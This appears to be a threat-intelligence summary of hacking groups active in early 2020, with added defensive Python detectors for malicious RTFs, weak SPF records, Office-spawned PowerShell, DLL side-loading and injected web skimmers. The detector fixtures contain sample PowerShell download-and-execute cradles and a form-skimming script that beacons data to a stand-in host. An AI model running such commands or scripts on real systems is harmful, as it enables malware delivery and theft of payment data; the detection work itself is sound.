Monthly Threat Actor Group Intelligence Report, March 2020

This is a summary of the activity of suspected state-sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from February 21, 2020 to March 20, 2020.

1. SectorA Activity Features

A total of two hacking groups, SectorA01 and SectorA05, were discovered among the SectorA groups this March.

SectorA01 group's hacking activity was found in Vietnam, China, Indonesia, the United Kingdom, Hong Kong and the United States. This March the SectorA01 group created a new variant of its malware targeting Automated Teller Machines (ATMs).

SectorA05 group's hacking activity was found in South Korea, the United States and the United Kingdom. They used a bait document in the form of a Hangul word processor file (HWP) disguised as a resume. Bait documents in the form of MS Office files were also found; these used the themes of news, instructions, and a letter from the Secretary of the United States, related to COVID-19 and the Kaesong Industrial Complex.

The purpose of the SectorA groups' hacking activities to date has been to collect high-quality information about the political and diplomatic activities of South Korea and to steal money from financial organizations around the world. This purpose has remained the same for a long time and is expected to continue unchanged for the time being.

2. SectorB Activity Features

A total of five hacking groups, SectorB01, SectorB04, SectorB08, SectorB09 and SectorB22, were discovered among the SectorB groups this March.

SectorB01 group's hacking activity was found in Kyrgyzstan, Pakistan, China, Hong Kong, Vietnam and the United States. The attackers used a document exploiting the CVE-2017-11882 vulnerability (a memory corruption bug in the legacy Microsoft Office Equation Editor). When the document is opened, it drops malware in the form of a DLL and downloads additional malware. The lure used the content of a news article: "The discussions between Kyrgyzstan's president and the Minister of Finance about reducing budgets due to COVID-19".

SectorB04 group's hacking activity was found in China. The attackers used malware in the form of an LNK (Windows shortcut) file disguised as a document file. When the LNK file is executed, an embedded Visual Basic Script (VBScript) generates an executable file. To avoid user suspicion, the malware displays a PDF file of an actual COVID-19 related report shared by the WHO with health authorities in each country.

SectorB08 group's hacking activity was found in South Korea. The attackers used malware in the form of Excel and PowerPoint files disguised as an emergency contact list for a specific religious group.

SectorB09 group's hacking activity was found in Taiwan. The attackers used malware in the form of an ELF file targeting Linux environments. The malware connects to a C2 server, executes shell commands, and uploads and downloads files.

SectorB22 group's hacking activity was found in Mongolia, Russia, Ukraine, China, Hong Kong, Belarus, the United Kingdom, Vietnam, the Philippines, Taiwan and South Korea. The attackers used an RTF file containing the CVE-2017-11882 exploit, identical to that found in other SectorB subgroups. When the file is opened, it drops malware in the form of a DLL and downloads additional malware. The document used the theme "Promoting Prevention and Management of COVID-19 Disease presented by the Prime Minister of Vietnam".
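Both SectorB01 and SectorB22 delivered CVE-2017-11882 in RTF files. Because that vulnerability can only be reached through the legacy Equation Editor OLE object, the cheapest mail-gateway triage for an inbound RTF is to check whether it embeds an Equation.3 object at all. The script below is an added example written for this report, not code from NSHC or from the samples described above; the two RTF strings in it are constructed, and the ProgID and CLSID values are the public identifiers of Equation Editor 3.0.

```python
import re

# CVE-2017-11882 is triggered through the legacy Equation Editor OLE object, so the
# first-pass check for an inbound RTF is: does it embed an Equation.3 object at all?
# The indicator values are the public ProgID and CLSID of Equation Editor 3.0.
EQUATION_OBJCLASS = re.compile(r"\\objclass\s*Equation\.3", re.IGNORECASE)
EQUATION_PROGID_HEX = "4571756174696f6e2e33"              # "Equation.3" hex-encoded in \objdata
EQUATION_CLSID_HEX = "02ce020000000000c000000000000046"  # {0002CE02-0000-0000-C000-000000000046}, little-endian

# Constructed samples (not real malware): one embedding an Equation.3 object, one without.
SUSPICIOUS_RTF = (
    r"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}"
    "\r\n"
    r"{\*\objdata 01050000020000000b000000"
    "\r\n"                                   # hex inside \objdata is normally wrapped across lines
    r"4571756174696f6e2e3300000000000000"
    r"02ce020000000000c000000000000046}}}"
)
BENIGN_RTF = r"{\rtf1\ansi Quarterly report {\*\objclass Package} no equations here}"


def scan_rtf(data: bytes) -> dict:
    """Report which Equation Editor indicators an RTF contains and whether to quarantine it."""
    text = data.decode("latin-1")                 # RTF is 7-bit ASCII; latin-1 never fails
    compact = re.sub(r"\s+", "", text).lower()    # join hex runs that were split by CRLF/spaces
    indicators = []
    if EQUATION_OBJCLASS.search(text):
        indicators.append("objclass_equation3")
    if EQUATION_PROGID_HEX in compact:
        indicators.append("progid_hex")
    if EQUATION_CLSID_HEX in compact:
        indicators.append("clsid_hex")
    return {
        "has_ole_object": "\\object" in text,
        "auto_update": "\\objupdate" in text,      # forces the object to load as soon as the file opens
        "indicators": indicators,
        "suspicious": bool(indicators),
    }


if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(sample.encode("latin-1")))
```

Two caveats for anyone deploying this: a hit proves only that an Equation Editor object is embedded, which some pre-2018 documents do legitimately, but Microsoft removed Equation Editor from Office in January 2018, so on patched systems the object has no legitimate use and quarantining is reasonable. Exploit builders also pad and obfuscate the \objdata hex with RTF control words, so treat this as a cheap filter and follow up with a real RTF object parser (for example rtfobj from the oletools project) before declaring a file clean.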
The purpose of the hacking activities of SectorB groups to date is to collect high-level information such as political and diplomatic activities of government agencies around the world.

3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02 and SectorC08, were discovered among SectorC groups this March.

SectorC01 group's hacking activity was found in several countries in Africa, Europe, the Middle East, North and South America and South Asia. The group continued to carry out credential phishing activity that leverages the Sender Policy Framework (SPF) records domains publish in DNS.
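The report does not say how SectorC01 leveraged SPF. The defensive check a practitioner would run, on the working assumption that the phishing mail spoofs sender domains whose SPF records are absent or permissive, is an audit of the SPF posture of the domains they own and the partner domains they accept mail from. The script below is an added example written for this report, not NSHC code; the TXT answers in it are constructed for hypothetical domains under the reserved .example TLD, and it does not follow redirect= targets because it works offline.

```python
import re

# Constructed DNS TXT answers for hypothetical domains (reserved .example TLD).
# In practice fetch them with dnspython or `dig TXT <domain>`.
SAMPLE_TXT_RECORDS = {
    "good.example":    ["v=spf1 ip4:192.0.2.0/24 include:_spf.mail.example -all"],
    "soft.example":    ["v=spf1 include:_spf.mail.example ~all"],
    "open.example":    ["v=spf1 +all"],
    "neutral.example": ["v=spf1 ip4:198.51.100.7 ?all"],
    "noall.example":   ["v=spf1 mx a"],
    "nospf.example":   ["site-verification=abc123"],
    "double.example":  ["v=spf1 -all", "v=spf1 ip4:203.0.113.1 -all"],
}

# Terms that cost a DNS lookup; RFC 7208 caps them at 10 per evaluation.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}

VERDICTS = {
    "-": ("ok",       "'-all': mail from unauthorised hosts is rejected"),
    "~": ("softfail", "'~all': spoofed mail is only soft-failed; enforcement depends on DMARC"),
    "?": ("neutral",  "'?all': spoofed mail evaluates neutral and is normally delivered"),
    "+": ("open",     "'+all': every host on the Internet is authorised to send as this domain"),
    None: ("neutral", "no 'all' term: unmatched senders default to neutral (redirect= not followed here)"),
}


def term_name(term: str) -> str:
    """'include:_spf.x' -> 'include', '-all' -> 'all', 'redirect=x' -> 'redirect', 'a/24' -> 'a'."""
    return re.split(r"[:/=]", term.lstrip("+-~?"), maxsplit=1)[0].lower()


def audit_spf(domain: str, txt_records: list) -> dict:
    """Classify one domain's SPF posture from its TXT answers (no network access needed)."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return {"domain": domain, "verdict": "no-spf",
                "reason": "no v=spf1 record; receivers cannot tell spoofed mail from genuine"}
    if len(spf) > 1:
        return {"domain": domain, "verdict": "invalid",
                "reason": "more than one v=spf1 record; RFC 7208 treats this as permerror"}
    terms = spf[0].split()[1:]
    lookups = sum(1 for t in terms if term_name(t) in LOOKUP_TERMS)
    if lookups > 10:
        return {"domain": domain, "verdict": "invalid",
                "reason": f"{lookups} DNS-lookup terms exceed the RFC 7208 limit of 10 (permerror)"}
    qualifier = None
    for t in terms:
        if term_name(t) == "all":
            qualifier = t[0] if t[0] in "+-~?" else "+"   # a bare mechanism means '+'
    verdict, reason = VERDICTS[qualifier]
    return {"domain": domain, "verdict": verdict, "reason": reason, "lookups": lookups}


if __name__ == "__main__":
    for domain, records in SAMPLE_TXT_RECORDS.items():
        print(audit_spf(domain, records))
```

An SPF record only tells receivers which hosts may send for the domain; without a DMARC policy of quarantine or reject, even a "-all" record does nothing for lookalike domains or for mail whose visible From: header differs from the envelope sender, which is the case SPF was never designed to cover.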

SectorC02 group's hacking activity was found in Armenia, Israel, Romania, South Korea, Sweden, France and Moldova. The group used the watering hole method: it injected JavaScript into target web sites and collected browser and OS information about specific users who revisited those sites.

SectorC08 group's hacking activity was found in Ukraine, Russia, Hong Kong, the Philippines and the United States. The attackers used malware in the form of an MS Word file containing macro scripts. The document was themed as "COVID-19 News" and disguised as having been sent by the Ukrainian Ministry of Health's Public Health Center.

The purpose of the SectorC groups' hacking activities to date is to collect high-level information, such as political and diplomatic activities, in countries located near the country supporting SectorC.

4. SectorD Activity Features

A total of three hacking groups, SectorD01, SectorD02 and SectorD11, were discovered among SectorD groups this March.

SectorD01 group's hacking activity was found in Lebanon, the United Kingdom and Ireland. The attackers used spear phishing emails with malware attached in the form of an MS Excel file. When the document is opened, its macro script executes malware aimed at data exfiltration on the infected system.

SectorD02 group's hacking activity was found in Canada, China, Georgia, Armenia, South Korea, Azerbaijan, India, Iraq, Turkey, Jordan and Australia. The attackers used spear phishing emails with an attached MS Excel file containing macro scripts. When the macro script executes, a PowerShell script downloads additional payloads from a hard-coded attacker server.
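The macro-to-PowerShell chain described for SectorD02 (and the macro documents of SectorC08, SectorD01 and SectorH03) leaves a reliable trace on the endpoint: an Office application spawning a script host, often with a download cradle on the command line. The script below is an added detection example written for this report, not NSHC code or a reproduction of the group's macro; it runs over constructed process-creation events in the shape of Sysmon Event ID 1, and the paths, command lines and IPs (TEST-NET documentation ranges) are hypothetical. It also decodes PowerShell's -EncodedCommand argument, which is base64 of UTF-16LE, so a cradle hidden there is still matched.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|certutil.*-urlcache|https?://", re.IGNORECASE)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to three fields).
# Paths, command lines and IPs are hypothetical; the encoded command is built at runtime.
_ENC = base64.b64encode("iwr http://198.51.100.5/a.exe -OutFile a.exe".encode("utf-16-le")).decode()
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')\""},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f"powershell.exe -w hidden -enc {_ENC}"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c whoami"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmd": "splwow64.exe 12288"},          # normal print-spooler helper, not a script host
]


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmd: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); empty string if absent/invalid."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def triage(events: list) -> list:
    """Alert on Office -> script host; escalate when a download cradle is visible."""
    alerts = []
    for ev in events:
        if basename(ev["parent"]) not in OFFICE_APPS or basename(ev["image"]) not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(ev["cmd"])
        cradle = bool(DOWNLOAD_CRADLE.search(ev["cmd"] + " " + decoded))
        alerts.append({
            "rule": "office-spawned-script-host",
            "severity": "high" if cradle else "medium",
            "parent": basename(ev["parent"]), "child": basename(ev["image"]),
            "decoded": decoded, "cmd": ev["cmd"],
        })
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["decoded"] or alert["cmd"])
```

The parent-child pair alone is worth a medium alert in most environments, because legitimate Office add-ins rarely launch cmd.exe or PowerShell; the cradle keywords only decide how urgently to respond. Macros that launch the script host through WMI or a scheduled task break the direct parent link, so pair this rule with one keyed on the user's Office process having an open document from the mail client's attachment folder.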

SectorD11 group's hacking activity was found in Libya, Turkey, France and Egypt. The attackers created APK files targeting Android environments using various themes; the malware was disguised as a COVID-19 infection status check app.

The SectorD groups conducted hacking activities targeting countries related to the political rivals of SectorD. Their purpose is to collect high-level information, such as political and diplomatic activities, on people or nations opposed to the SectorD government.

5. SectorE Activity Features

A total of one hacking group, SectorE01, was discovered among the SectorE groups this March.

SectorE01 group's hacking activity was found in China, Japan and Italy. The attackers used an executable file disguised as a document file by giving it the icon of an MS Office program. The file name relates to the "Business Regulations of the Central Party School of the Communist Party of China", an institution that trains senior officials of the Chinese Communist Party.

Until now, the SectorE groups' hacking activities have been intended to gather high-level information, including political, diplomatic and military activities involving the Pakistani government. Recently, however, they have expanded their activity to East Asia and other regions, including China, as their efforts to obtain high-level information on the politics, diplomacy and technology of other countries have increased.

6. SectorF Activity Features

A total of one hacking group, SectorF01, was discovered among the SectorF groups this March.

SectorF01 group's hacking activity was found in China, Ukraine and Spain. They used the DLL side-loading method, in which a malicious DLL is loaded by the legitimate WPS Office program, a Chinese-made office suite. When the program runs, it loads the malicious DLL and then displays a normal document containing the body of a news article related to COVID-19 to avoid the user's suspicion. Finally, it loads a backdoor that collects information about the infected system.
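Side-loading works because, for most DLLs (those not on the KnownDLLs list), Windows searches the application's own directory before System32, so a legitimate signed executable dropped next to a malicious DLL will load it. The detection below is an added example written for this report, not NSHC code; it runs over constructed image-load events in the shape of Sysmon Event ID 7. The paths are hypothetical, the executable name is only illustrative and says nothing about which DLL SectorF01 actually abused, and the list of system DLL names is a hand-typed subset standing in for a baseline generated from a clean reference host.

```python
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "c:\\programdata\\", "c:\\users\\public\\")
# Subset of Windows DLL names that are popular side-loading targets (assumption: a real
# baseline should be generated from a clean reference host rather than hand-typed).
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptsp.dll",
                    "userenv.dll", "winhttp.dll", "iphlpapi.dll", "msimg32.dll"}

# Constructed image-load events (Sysmon Event ID 7 style). Paths are hypothetical; the
# application name is illustrative only.
EVENTS = [
    {"process": r"C:\Users\victim\AppData\Local\Temp\report\wps.exe",
     "dll": r"C:\Users\victim\AppData\Local\Temp\report\version.dll", "signed": False},
    {"process": r"C:\Users\victim\AppData\Local\Temp\report\wps.exe",
     "dll": r"C:\Users\victim\AppData\Local\Temp\report\render.dll", "signed": False},
    {"process": r"C:\Program Files\SomeVendor\wps.exe",
     "dll": r"C:\Windows\System32\version.dll", "signed": True},
    {"process": r"C:\Program Files\SomeVendor\wps.exe",
     "dll": r"C:\Program Files\SomeVendor\render.dll", "signed": True},
]


def norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def dirname(path: str) -> str:
    return norm(path).rsplit("\\", 1)[0] + "\\"


def basename(path: str) -> str:
    return norm(path).rsplit("\\", 1)[-1]


def check_image_load(ev: dict):
    """Return an alert dict for a suspicious DLL load, or None."""
    dll_dir, dll_name = dirname(ev["dll"]), basename(ev["dll"])
    exe_dir = dirname(ev["process"])
    findings = []
    # Rule 1: a DLL that carries the name of a Windows system DLL but lives outside
    # System32/SysWOW64 is the classic side-loading shim (search order puts it first).
    if dll_name in SYSTEM_DLL_NAMES and not dll_dir.startswith(SYSTEM_DIRS):
        findings.append("system-dll-name-outside-system-dir")
    # Rule 2: an unsigned DLL loaded from the executable's own directory when that
    # directory is user-writable (where a phishing lure would have unpacked to).
    if dll_dir == exe_dir and any(m in exe_dir for m in USER_WRITABLE) and not ev["signed"]:
        findings.append("unsigned-app-dir-dll-from-user-writable-path")
    if not findings:
        return None
    severity = "high" if "system-dll-name-outside-system-dir" in findings and not ev["signed"] else "medium"
    return {"severity": severity, "findings": findings,
            "process": basename(ev["process"]), "dll": ev["dll"]}


if __name__ == "__main__":
    for ev in EVENTS:
        alert = check_image_load(ev)
        if alert:
            print(alert["severity"], alert["process"], "loaded", alert["dll"], alert["findings"])
```

Rule 2 fires on benign portable applications that users run from Downloads, so in production it is best combined with the signer of the executable: a signed, well-known host binary loading an unsigned DLL from a temp directory is far more specific than either condition alone.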

The SectorF01 group aims to gather high-level information, including political, diplomatic and military activities, in nearby countries. It also aims to steal advanced technical information to advance its country's economic development.

7. SectorH Activity Features

A total of one hacking group, SectorH03, was discovered among the SectorH groups this March.

The SectorH03 group's hacking activity was found in Hong Kong, Pakistan, India, the Netherlands and Hungary. The attackers used spear phishing emails with an attached MS Excel file, similar to their past activity. When the malicious document is opened, the embedded remote control malware is dropped; it performs tasks such as collecting login information stored in browsers and collecting files.

The SectorH groups' hacking activities include activity for both cybercrime and government-support purposes. As diplomatic friction with neighboring countries continues to increase, activities to gather high-level military and political information from them will also continue.

8. SectorQ Activity Features

A total of one hacking group, SectorQ01, was discovered among the SectorQ groups this March.

The SectorQ01 group's hacking activity was found in China, Germany, Japan, Iraq, the United Kingdom, the United States, India, Ireland, Russia, France, Austria, Iran, Syria and Hungary. The group has been active since at least 2007. Among the malware found were SYS (Windows driver) files and files targeting macOS.

The purpose of the SectorQ groups' hacking activities to date is to collect high-level information, such as political and diplomatic activities of government agencies around the world. The collection of this information is intended to maximize the political and economic interests of the supporting country.

9. Cyber Crime Activity Features

A total of four hacking groups, SectorJ03, SectorJ04, SectorJ09 and SectorJ14, were discovered among the SectorJ groups this March.

Unlike the government-sponsored hacking groups, these groups target online information that can be turned into money. They hacked specific companies and organizations and then deployed ransomware on their internal networks, or stole important industry secrets and threatened the victims to demand monetary payments.

The SectorJ03 group's hacking activity was found in the United Arab Emirates, the Philippines, Russia, the United Kingdom, China, Romania, Jordan, the United States, the Netherlands, France and Palestine. The attackers used spear phishing emails with an attached MS Office document containing macro scripts or a PDF file containing a link.

The SectorJ04 group's hacking activity was found in many countries: India, the United States, Canada, Mozambique, the United Kingdom, Iceland, Germany, Hong Kong, Hungary, Switzerland, Romania, Ukraine, Lithuania, France, Israel, Czechia, Uruguay, Iran, Poland, Finland, Singapore, Latvia, Ireland, Italy, Greece, the Netherlands and China. The attackers used spam mail that contained a malicious link or an attached MS Office file, similar to their past activity. In this campaign the attackers wrote the body of the spam mail around COVID-19. When the malicious link is clicked, a malicious document containing macro scripts is downloaded from the attacker's server.

The SectorJ09 group's hacking activity was found in France. The attackers collect users' names, addresses, email addresses, phone numbers and credit card payment information by inserting obfuscated skimming scripts into websites. This is similar to their previous hacking activities.
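SectorJ09's skimming scripts and SectorC02's watering-hole JavaScript are the same problem from the site owner's side: code has been injected into pages that the owner did not put there, and it reads something from the visitor (form fields in one case, browser and OS details in the other) and sends it to a third party. The scanner below is an added example written for this report, not NSHC code or a reproduction of either group's script; it pulls every script tag out of a page, checks external sources against an allowlist of the site's own hosts (an assumption you must fill in), and flags inline scripts that combine collection with a beacon or that stack obfuscation primitives. The HTML it runs over is constructed, with all domains under the reserved .example TLD.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the site legitimately loads scripts from; anything else is unknown.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

OBFUSCATION = {
    "eval": re.compile(r"\beval\s*\("),
    "fromCharCode": re.compile(r"fromCharCode"),
    "atob": re.compile(r"\batob\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "hex-escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}
COLLECTION = {
    "form-fields": re.compile(r"querySelectorAll\s*\(\s*['\"]input|\bFormData\b|\.value\b"),
    "fingerprint": re.compile(r"navigator\.(?:userAgent|platform|plugins|language)|screen\.(?:width|height)"),
}
EXFIL = {
    "beacon": re.compile(r"new\s+Image\s*\(|sendBeacon|XMLHttpRequest|\bfetch\s*\(|WebSocket"),
}

# Constructed page: one allowed and one unknown external script, one benign inline script,
# one skimmer-style inline script and one fingerprinting inline script.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.shop.example/app.js"></script>
<script src="https://static-cdn-analytics.example/track.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () { console.log('ready'); });
</script>
<script>
var k=String.fromCharCode(104,116,116,112,115,58,47,47);
document.querySelector('form').addEventListener('submit',function(){
 var d={};document.querySelectorAll('input').forEach(function(i){d[i.name]=i.value;});
 new Image().src=k+'collect.example/g?'+btoa(JSON.stringify(d));});
</script>
<script>
fetch('https://stat.collect.example/v',{method:'POST',body:navigator.userAgent+'|'+navigator.platform+'|'+screen.width});
</script>
</head><body><form><input name="cc"></form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page as {"src": url-or-None, "body": inline text}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data       # script content may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def scan_html(html: str) -> list:
    """Return findings for external scripts from unknown hosts and suspicious inline scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for i, s in enumerate(parser.scripts):
        if s["src"]:
            host = urlparse(s["src"]).hostname or ""
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append({"script": i, "kind": "external", "src": s["src"],
                                 "reasons": ["unknown-host:" + host]})
            continue
        obf = [n for n, rx in OBFUSCATION.items() if rx.search(s["body"])]
        collects = [n for n, rx in COLLECTION.items() if rx.search(s["body"])]
        exfil = [n for n, rx in EXFIL.items() if rx.search(s["body"])]
        # collection plus a way to send it out, or stacked obfuscation, is what we care about
        if (collects and exfil) or len(obf) >= 2:
            findings.append({"script": i, "kind": "inline", "reasons": obf + collects + exfil})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f)
```

Legitimate analytics scripts also read navigator properties and call fetch, so the inline heuristics produce noise on their own; the reliable signal is the diff against a known-good copy of the page, which this scanner supports by making the script inventory explicit. Since skimmers are frequently injected into an already-allowed first-party file rather than added as a new tag, hash the allowed external scripts as well and alert when their contents change.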

The SectorJ14 group's hacking activity was found in Japan. The attackers distributed malware in the form of an APK (Android Application Package) file via smishing messages containing a link. The malicious APK was disguised as a courier company application. If an application of a bank or mobile carrier is installed on the infected device, a phishing page for information collection is popped up over it.

The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.